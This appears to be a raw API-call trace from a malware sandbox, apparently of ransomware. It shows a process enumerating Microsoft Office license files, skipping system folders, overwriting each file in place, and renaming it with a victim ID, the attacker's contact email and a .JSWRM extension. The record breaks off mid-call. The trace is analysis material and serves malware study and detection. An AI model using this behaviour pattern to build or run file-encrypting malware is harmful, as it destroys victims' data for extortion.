0x241010 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.118] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24303) returned 1 [0109.118] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.118] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.121] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.121] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.121] CloseHandle (hObject=0x45c) returned 1 [0109.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0109.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0109.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0109.123] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea31aebb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea31aebb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea38d533, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", cAlternateFileName="PRA220~1.XRM")) returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.123] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0109.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0109.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0109.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.124] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.124] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.124] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.126] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.126] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.127] CloseHandle (hObject=0x45c) returned 1 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0109.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0109.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0109.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0109.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0109.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.128] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea2cea2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea2cea2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea3673f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", cAlternateFileName="PR8F81~1.XRM")) returned 1 [0109.128] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.128] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.129] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.130] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.130] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.130] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.132] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.132] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.133] CloseHandle (hObject=0x45c) returned 1 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0109.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0109.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0109.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0109.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.133] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0109.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.134] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea2a87f0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea2a87f0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea341107, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp5-pl.xrm-ms", cAlternateFileName="PRCCFF~1.XRM")) returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2=".") returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="..") returned 1 [0109.134] lstrcmpiW 